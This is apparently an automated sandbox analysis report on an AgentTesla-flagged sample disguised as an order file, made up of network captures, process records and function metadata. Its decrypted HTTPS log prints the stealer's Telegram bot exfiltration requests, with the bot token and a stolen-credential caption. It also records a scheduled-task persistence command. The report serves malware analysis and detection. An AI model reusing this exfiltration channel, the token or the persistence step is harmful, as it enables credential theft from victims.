Dec 9, 2022 10:19:40.945044041 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:40.980653048 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:40.983958960 CET	49696	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:19:40.984009981 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:41.150307894 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:41.150484085 CET	443	49696	149.154.167.220	192.168.2.4
Dec 9, 2022 10:19:41.150557995 CET	49696	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:19:41.150974035 CET	49696	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:19:53.055398941 CET	49697	443	192.168.2.4	54.91.59.199
Dec 9, 2022 10:19:53.055483103 CET	443	49697	54.91.59.199	192.168.2.4
Dec 9, 2022 10:19:53.055583954 CET	49697	443	192.168.2.4	54.91.59.199
Dec 9, 2022 10:19:53.072854996 CET	49697	443	192.168.2.4	54.91.59.199
Dec 9, 2022 10:19:53.072901011 CET	443	49697	54.91.59.199	192.168.2.4
Dec 9, 2022 10:19:53.324731112 CET	443	49697	54.91.59.199	192.168.2.4
Dec 9, 2022 10:19:53.324889898 CET	49697	443	192.168.2.4	54.91.59.199
Dec 9, 2022 10:19:53.327763081 CET	49697	443	192.168.2.4	54.91.59.199
Dec 9, 2022 10:19:53.327800989 CET	443	49697	54.91.59.199	192.168.2.4
Dec 9, 2022 10:19:53.328203917 CET	443	49697	54.91.59.199	192.168.2.4
Dec 9, 2022 10:19:53.534943104 CET	443	49697	54.91.59.199	192.168.2.4
Dec 9, 2022 10:19:53.535114050 CET	49697	443	192.168.2.4	54.91.59.199
Dec 9, 2022 10:19:53.805990934 CET	49697	443	192.168.2.4	54.91.59.199
Dec 9, 2022 10:19:53.806211948 CET	443	49697	54.91.59.199	192.168.2.4
Dec 9, 2022 10:19:53.927993059 CET	443	49697	54.91.59.199	192.168.2.4
Dec 9, 2022 10:19:53.928147078 CET	443	49697	54.91.59.199	192.168.2.4
Dec 9, 2022 10:19:53.928283930 CET	49697	443	192.168.2.4	54.91.59.199
Dec 9, 2022 10:19:53.929414034 CET	49697	443	192.168.2.4	54.91.59.199
Dec 9, 2022 10:20:16.890120983 CET	49698	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:20:16.890194893 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:16.890625954 CET	49698	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:20:16.891558886 CET	49698	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:20:16.891596079 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:16.961730957 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:16.962007999 CET	49698	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:20:16.966172934 CET	49698	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:20:16.966219902 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:16.966680050 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:16.969074011 CET	49698	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:20:16.969122887 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:17.013200998 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:17.013797998 CET	49698	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:20:17.013845921 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:17.194960117 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:17.195230007 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:17.195997000 CET	49698	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:20:17.196050882 CET	443	49698	149.154.167.220	192.168.2.4
Dec 9, 2022 10:20:17.196135044 CET	49698	443	192.168.2.4	149.154.167.220
Dec 9, 2022 10:20:17.196135044 CET	49698	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2022 10:19:22.594918013 CET	56572	53	192.168.2.4	8.8.8.8
Dec 9, 2022 10:19:22.613454103 CET	53	56572	8.8.8.8	192.168.2.4
Dec 9, 2022 10:19:22.628007889 CET	50911	53	192.168.2.4	8.8.8.8
Dec 9, 2022 10:19:22.646457911 CET	53	50911	8.8.8.8	192.168.2.4
Dec 9, 2022 10:19:40.828479052 CET	59683	53	192.168.2.4	8.8.8.8
Dec 9, 2022 10:19:40.847109079 CET	53	59683	8.8.8.8	192.168.2.4
Dec 9, 2022 10:19:52.963900089 CET	64167	53	192.168.2.4	8.8.8.8
Dec 9, 2022 10:19:52.980617046 CET	53	64167	8.8.8.8	192.168.2.4
Dec 9, 2022 10:19:53.015748024 CET	58565	53	192.168.2.4	8.8.8.8
Dec 9, 2022 10:19:53.034867048 CET	53	58565	8.8.8.8	192.168.2.4
Dec 9, 2022 10:20:16.871406078 CET	52239	53	192.168.2.4	8.8.8.8
Dec 9, 2022 10:20:16.888513088 CET	53	52239	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2022 10:19:22.594918013 CET	192.168.2.4	8.8.8.8	0xcdbb	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:22.628007889 CET	192.168.2.4	8.8.8.8	0x39c2	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:40.828479052 CET	192.168.2.4	8.8.8.8	0xc143	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:52.963900089 CET	192.168.2.4	8.8.8.8	0xaabb	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:53.015748024 CET	192.168.2.4	8.8.8.8	0x1a60	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:20:16.871406078 CET	192.168.2.4	8.8.8.8	0x7df	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2022 10:19:22.613454103 CET	8.8.8.8	192.168.2.4	0xcdbb	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2022 10:19:22.613454103 CET	8.8.8.8	192.168.2.4	0xcdbb	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:22.613454103 CET	8.8.8.8	192.168.2.4	0xcdbb	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:22.613454103 CET	8.8.8.8	192.168.2.4	0xcdbb	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:22.613454103 CET	8.8.8.8	192.168.2.4	0xcdbb	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:22.646457911 CET	8.8.8.8	192.168.2.4	0x39c2	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2022 10:19:22.646457911 CET	8.8.8.8	192.168.2.4	0x39c2	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:22.646457911 CET	8.8.8.8	192.168.2.4	0x39c2	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:22.646457911 CET	8.8.8.8	192.168.2.4	0x39c2	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:22.646457911 CET	8.8.8.8	192.168.2.4	0x39c2	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:40.847109079 CET	8.8.8.8	192.168.2.4	0xc143	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:52.980617046 CET	8.8.8.8	192.168.2.4	0xaabb	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2022 10:19:52.980617046 CET	8.8.8.8	192.168.2.4	0xaabb	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:52.980617046 CET	8.8.8.8	192.168.2.4	0xaabb	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:52.980617046 CET	8.8.8.8	192.168.2.4	0xaabb	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:52.980617046 CET	8.8.8.8	192.168.2.4	0xaabb	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:53.034867048 CET	8.8.8.8	192.168.2.4	0x1a60	No error (0)	api.ipify.org	api.ipify.org.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2022 10:19:53.034867048 CET	8.8.8.8	192.168.2.4	0x1a60	No error (0)	api.ipify.org.herokudns.com		3.220.57.224	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:53.034867048 CET	8.8.8.8	192.168.2.4	0x1a60	No error (0)	api.ipify.org.herokudns.com		54.91.59.199	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:53.034867048 CET	8.8.8.8	192.168.2.4	0x1a60	No error (0)	api.ipify.org.herokudns.com		3.232.242.170	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:19:53.034867048 CET	8.8.8.8	192.168.2.4	0x1a60	No error (0)	api.ipify.org.herokudns.com		52.20.78.240	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:20:16.888513088 CET	8.8.8.8	192.168.2.4	0x7df	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49695	3.232.242.170	443	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Timestamp	Direction	Data
2022-12-09 09:19:24 UTC	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2022-12-09 09:19:24 UTC	IN	HTTP/1.1 200 OK Server: Cowboy Connection: close Content-Type: text/plain Vary: Origin Date: Fri, 09 Dec 2022 09:19:24 GMT Content-Length: 11 Via: 1.1 vegur
2022-12-09 09:19:24 UTC	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 35 31 Data Ascii: 84.17.52.51

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49696	149.154.167.220	443	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-09 09:19:40 UTC	0	OUT	POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dad9d3fba18902 Host: api.telegram.org Content-Length: 1079 Expect: 100-continue Connection: Keep-Alive
2022-12-09 09:19:40 UTC	0	IN	HTTP/1.1 100 Continue
2022-12-09 09:19:40 UTC	0	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 39 64 33 66 62 61 31 38 39 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 34 34 35 38 34 35 33 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 39 64 33 66 62 61 31 38 39 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 39 2f 32 30 32 32 20 31 30 3a 35 35 3a 35 36 0a 55 73 65 72 Data Ascii: -----------------------------8dad9d3fba18902Content-Disposition: form-data; name="chat_id"1644584536-----------------------------8dad9d3fba18902Content-Disposition: form-data; name="caption"New PW Recovered!Time: 12/09/2022 10:55:56User
2022-12-09 09:19:40 UTC	1	OUT	Data Raw: 68 72 3e 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 39 64 33 66 62 61 31 38 39 30 32 2d 2d 0d 0a Data Ascii: hr>-----------------------------8dad9d3fba18902--
2022-12-09 09:19:41 UTC	1	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 09 Dec 2022 09:19:41 GMT Content-Type: application/json Content-Length: 746 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":146,"from":{"id":5962712783,"is_bot":true,"first_name":"agunwa","username":"agunwabot"},"chat":{"id":1644584536,"first_name":"rodriguez","last_name":"david","username":"rodeiguez1b","type":"private"},"date":1670577581,"document":{"file_name":"user-066656 2022-12-09 10-55-56.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAOSY5L9rZ5kDQrJgBLgqKab5bD1VkoAAh0RAAKCnZhQsPT-HrQvQ5srBA","file_unique_id":"AgADHREAAoKdmFA","file_size":459},"caption":"New PW Recovered!\n\nTime: 12/09/2022 10:55:56\nUser Name: user/066656\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 84.17.52.51","caption_entities":[{"offset":178,"length":11,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49697	54.91.59.199	443	C:\Users\user\AppData\Roaming\WsdnBq.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-09 09:19:53 UTC	2	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2022-12-09 09:19:53 UTC	2	IN	HTTP/1.1 200 OK Server: Cowboy Connection: close Content-Type: text/plain Vary: Origin Date: Fri, 09 Dec 2022 09:19:53 GMT Content-Length: 11 Via: 1.1 vegur
2022-12-09 09:19:53 UTC	3	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 35 31 Data Ascii: 84.17.52.51

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49698	149.154.167.220	443	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-09 09:20:16 UTC	3	OUT	POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dad9d46448f6a9 Host: api.telegram.org Content-Length: 1079 Expect: 100-continue Connection: Keep-Alive
2022-12-09 09:20:17 UTC	3	IN	HTTP/1.1 100 Continue
2022-12-09 09:20:17 UTC	3	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 39 64 34 36 34 34 38 66 36 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 34 34 35 38 34 35 33 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 39 64 34 36 34 34 38 66 36 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 39 2f 32 30 32 32 20 31 30 3a 35 38 3a 35 36 0a 55 73 65 72 Data Ascii: -----------------------------8dad9d46448f6a9Content-Disposition: form-data; name="chat_id"1644584536-----------------------------8dad9d46448f6a9Content-Disposition: form-data; name="caption"New PW Recovered!Time: 12/09/2022 10:58:56User
2022-12-09 09:20:17 UTC	4	OUT	Data Raw: 68 72 3e 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 39 64 34 36 34 34 38 66 36 61 39 2d 2d 0d 0a Data Ascii: hr>-----------------------------8dad9d46448f6a9--
2022-12-09 09:20:17 UTC	4	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 09 Dec 2022 09:20:17 GMT Content-Type: application/json Content-Length: 746 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":147,"from":{"id":5962712783,"is_bot":true,"first_name":"agunwa","username":"agunwabot"},"chat":{"id":1644584536,"first_name":"rodriguez","last_name":"david","username":"rodeiguez1b","type":"private"},"date":1670577617,"document":{"file_name":"user-066656 2022-12-09 10-58-56.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAOTY5L90dietgRPIdl-YxG-Yc9gSFEAAh4RAAKCnZhQgJByv9xAGVMrBA","file_unique_id":"AgADHhEAAoKdmFA","file_size":459},"caption":"New PW Recovered!\n\nTime: 12/09/2022 10:58:56\nUser Name: user/066656\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 84.17.52.51","caption_entities":[{"offset":178,"length":11,"type":"url"}]}}

Target ID:	0
Start time:	10:18:58
Start date:	09/12/2022
Path:	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
Imagebase:	0xb20000
File size:	873472 bytes
MD5 hash:	19081EF2A08F678A3203B29124043C41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	10:19:15
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
Imagebase:	0x10b0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	10:19:15
Start date:	09/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	10:19:16
Start date:	09/12/2022
Path:	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x320000
File size:	873472 bytes
MD5 hash:	19081EF2A08F678A3203B29124043C41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Target ID:	4
Start time:	10:19:16
Start date:	09/12/2022
Path:	C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x860000
File size:	873472 bytes
MD5 hash:	19081EF2A08F678A3203B29124043C41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Target ID:	5
Start time:	10:19:17
Start date:	09/12/2022
Path:	C:\Users\user\AppData\Roaming\WsdnBq.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\WsdnBq.exe
Imagebase:	0x8f0000
File size:	873472 bytes
MD5 hash:	19081EF2A08F678A3203B29124043C41
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 31%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	6
Start time:	10:19:43
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp
Imagebase:	0x10b0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	7
Start time:	10:19:43
Start date:	09/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	8
Start time:	10:19:44
Start date:	09/12/2022
Path:	C:\Users\user\AppData\Roaming\WsdnBq.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xeb0000
File size:	873472 bytes
MD5 hash:	19081EF2A08F678A3203B29124043C41
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Execution Graph

Execution Coverage:	14.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.2%
Total number of Nodes:	244
Total number of Limit Nodes:	20

Executed Functions

Function 0798ACC0 Relevance: 5.8, Strings: 2, Instructions: 3307COMMON

Download Yara Rule

Strings

<Ol, xrefs: 0798BBDF
<Ol, xrefs: 0798B9D1

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: <Ol$<Ol
API String ID: 0-3223239232
Opcode ID: 2cd2838395a95b121a6da736e26266156d163f4c7da3575aff24b0a84cefaf3b
Instruction ID: 81d61d4a5a5c0df11a4475fa4b110a998e9170f7d761371e5e1743412988e0ee
Opcode Fuzzy Hash: 2cd2838395a95b121a6da736e26266156d163f4c7da3575aff24b0a84cefaf3b
Instruction Fuzzy Hash: 647330B4A01219CFCB64EF68C894A9DB7B6FF49308F158599D4199B3A1CB31ED81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07985958 Relevance: 4.6, Strings: 3, Instructions: 894COMMON

Download Yara Rule

Strings

D0Ol, xrefs: 07985E2D
D0Ol, xrefs: 07985F2D
D0Ol, xrefs: 07985DA0

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: D0Ol$D0Ol$D0Ol
API String ID: 0-740783510
Opcode ID: d008d72563c300ac12418bef33e4e2a0dc68afa5027cd809de106b4691a14c7d
Instruction ID: b0a990210f24d411b9c72bda1dd8dfe71e282ec8d01e453d22395c9171feaf99
Opcode Fuzzy Hash: d008d72563c300ac12418bef33e4e2a0dc68afa5027cd809de106b4691a14c7d
Instruction Fuzzy Hash: 6E7270B0A001099FCB54EFA9D844AAEBBF6FF89308F158469E415EB352DB34DC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0799B710 Relevance: 2.7, Strings: 2, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HrT', xrefs: 0799B9D6
Dj, xrefs: 0799B8BA

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: Dj$HrT'
API String ID: 0-2934897141
Opcode ID: 4416e63c1b0b71b6d0e5c0d4bd62b7a82006853219dc0c1276f8220d67504e33
Instruction ID: c8200b20d50d2a956d31326c1a0fed1617bd19932f9ff73f30cde1481d30c2be
Opcode Fuzzy Hash: 4416e63c1b0b71b6d0e5c0d4bd62b7a82006853219dc0c1276f8220d67504e33
Instruction Fuzzy Hash: 9A9103B4E142099FDB04DFE9E8455AEFBB2FF89300F108529D41AAB358DB7899028F51

Uniqueness

Uniqueness Score: -1.00%

Function 07998BB0 Relevance: 1.6, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D0Ol, xrefs: 07998D03

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: D0Ol
API String ID: 0-582781791
Opcode ID: e8c966a1b41f18e8156e047eb83bfc2f4b3adbd67a1299c7d69c3a011c2e2419
Instruction ID: 5f11e3ee94c0e3371922c0a024486a4b63194174ce91cf8a9e772dac667e3a56
Opcode Fuzzy Hash: e8c966a1b41f18e8156e047eb83bfc2f4b3adbd67a1299c7d69c3a011c2e2419
Instruction Fuzzy Hash: 08C1C2B0E052198FDF08DFBCC5419AEBBB2BF8A218F14857DD505A7351EB749D018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0798E880 Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

D0Ol, xrefs: 0798EC49

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: D0Ol
API String ID: 0-582781791
Opcode ID: 552115fc702a9309b904d222a27ec1a651eaa06350f99e3b506b1b7b5371fa83
Instruction ID: 22d999c33efb3741d73bfe31ecd9b5f8eb0a91b23ecd86ab54302a6c5bd5fc8e
Opcode Fuzzy Hash: 552115fc702a9309b904d222a27ec1a651eaa06350f99e3b506b1b7b5371fa83
Instruction Fuzzy Hash: FDB13AB4B082158FC755EF79C4A496D7BA6BFC6208B1984AAD006CF3A5CB34DC42C792

Uniqueness

Uniqueness Score: -1.00%

Function 0798F7ED Relevance: 1.5, Strings: 1, Instructions: 279COMMON

Download Yara Rule

Strings

d&%, xrefs: 0798FA2C

Memory Dump Source

